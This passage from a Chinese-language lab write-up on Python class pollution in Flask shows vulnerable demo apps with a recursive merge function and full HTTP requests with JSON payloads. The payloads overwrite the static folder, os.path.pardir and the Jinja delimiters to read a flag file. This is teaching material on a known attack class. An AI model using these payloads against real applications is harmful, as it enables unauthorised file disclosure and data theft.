app.run(host="0.0.0.0")
|
还得是服务器啊,本地老是出问题,不知道为啥
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| POST / HTTP/1.1
Host: ip:5000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: psession=65b25e9d-b6c8-4b71-bb63-9417e0d14c45
Connection: close
Content-Type: application/json
Content-Length: 142
{
"__init__":{
"__globals__":{
"app":{
"_static_folder":"./"
}
}
}
}
|
然后污染成功就可以啦
1
2
3
4
5
6
7
8
9
10
| GET /static/flag HTTP/1.1
Host: ip:5000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: psession=65b25e9d-b6c8-4b71-bb63-9417e0d14c45
Connection: close
|
注意搭建环境的时候目录是这样的
os.path.pardir
这里test时把static文件夹改成templates
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
| from flask import Flask,request,render_template
import json
import os
app = Flask(__name__)
def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
class cls():
def __init__(self):
pass
instance = cls()
@app.route('/',methods=['POST', 'GET'])
def index():
if request.data:
merge(json.loads(request.data), instance)
return "flag in ./flag but u just can use /file to vist ./templates/file"
@app.route("/<path:path>")
def render_page(path):
if not os.path.exists("templates/" + path):
return "not found", 404
return render_template(path)
app.run(host="0.0.0.0",port=5000,debug=True)
|
这里很明显我们要目录穿越,但是它只让我们查看/templates里面的文件,那怎么办呢,先穿越,打出报错(但是像之前进行pin码计算一样,我也不能稳定的打出报错),访问/test.py打出报错,由于我们这里是因为渲染的报错,所以我们跟进这个
使用Ctrl+鼠标左键跟进来之后发现
继续跟进,注意我们这里是因为path的原因导致的渲染失败,所以我们进来找path
这个函数把我们的路径进行拆分,估计是这里有问题,还有就是我标的那个符号,引用Infernity师傅的话
这个符号名为重写符号,对父类进行重写,我们跟进的时候只需要看自己需要哪个,就找哪个
所以这里我们是路径问题,找到了第二个get_source函数,继续跟进
欧克啊终于是找到了,那么污染
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| POST / HTTP/1.1
Host: ip:5000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: psession=65b25e9d-b6c8-4b71-bb63-9417e0d14c45
Connection: close
Content-Type: application/json
Content-Length: 179
{
"__init__":{
"__globals__":{
"os":{
"path":{
"pardir":"?"
}
}
}
}
}
|
1
2
3
4
5
6
7
8
9
10
| GET /../flag HTTP/1.1
Host: ip:5000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: psession=65b25e9d-b6c8-4b71-bb63-9417e0d14c45
Connection: close
|
jinja_SSTI
大家常见的是{{}},但是有些特殊情况有这个是,那么我们就可以污染一下,使得其他符号也能做到相同的效果
1
2
3
4
5
| <html>
<h1>Look this -> [[flag]] <- try to make it become the real flag</h1>
<body>
</body>
</html>
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
| from flask import Flask,request,render_template
import json
app = Flask(__name__)
def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
class cls():
def __init__(self):
pass
instance = cls()
@app.route('/',methods=['POST', 'GET'])
def index():
if request.data:
merge(json.loads(request.data), instance)
return "go check /index before merge it"
@app.route('/index',methods=['POST', 'GET'])
def templates():
return render_template("index.html", flag = open("flag", "rt").read())
app.run(host="0.0.0.0",port=5000,debug=True)
|
这边尝试了一会儿,都拿不到报错消息,那我们本是是不是jinja的问题,那我们直接进flask,这里的目的就是污染jinja标识符为[[]],那样子我们就可以拿到flag了,找不到跟进哪里了,那看看官方文档https://jinja.palletsprojects.com/en/3.1.x/api/#jinja2.Environment
然后还是找不到,不过我们知道了一些重要消息,variable_start_string,variable_end_string,直接问AI知道是这里
好了,这里我们直接跟进,发现啥玩意,找不到任何东西
很显然么有任何用,但是看了看也才200多行,可以直接浏览一下,发现有很多类似于这种东西app.jinja_env.from_string,那我们此时直接替换成我们的不就可以了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
| POST / HTTP/1.1
Host: ip:5000
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: psession=65b25e9d-b6c8-4b71-bb63-9417e0d14c45
Connection: close
Content-Type: application/json
Content-Length: 250
{
"__init__":{
"__globals__":{
"app":{
"jinja_env":{
"variable_start_string":"[[",
"variable_end_string":"]]"
}
}
}
}
}
|
再访问index就拿到flag了,但是这里仍然有个小细节,就是如果直接跟着提示进入了/index,那么再次进行污染是不会被解析的
Flask默认会对一定数量内的模板文件编译渲染后进行缓存,下次访问时若有缓存则会优先渲染缓存,所以输入payload污染之后虽然语法标识符被替换了,但渲染的内容还是按照污染前语生成的缓存,由于缓存编译时并没有存在flag变量,所以自然没有被填充flag。
所以我们要先污染,再进行访问
padash
这个模块里面的函数和merge基本相同,同样可以做到污染的事情,后面再研究
0x03 小结
太优雅了,而且在这个过程中学会了跟进代码去审计,知道原理逻辑,虽然确实中间调试的时候会花费很多时间但是很开心!不过这里所提及的东西还是太过浅显,包括劫持等操作,后面还会探讨
0x04 reference
Infernity师傅对于代码审计部分的一些基本操作的帮助(第一次跟进,感觉很舒服)
期间还问了一些师傅其他问题,最后自己慢慢调试解决问题,谢谢师傅们的帮助啦
网上的文章都有看,谢谢师傅们!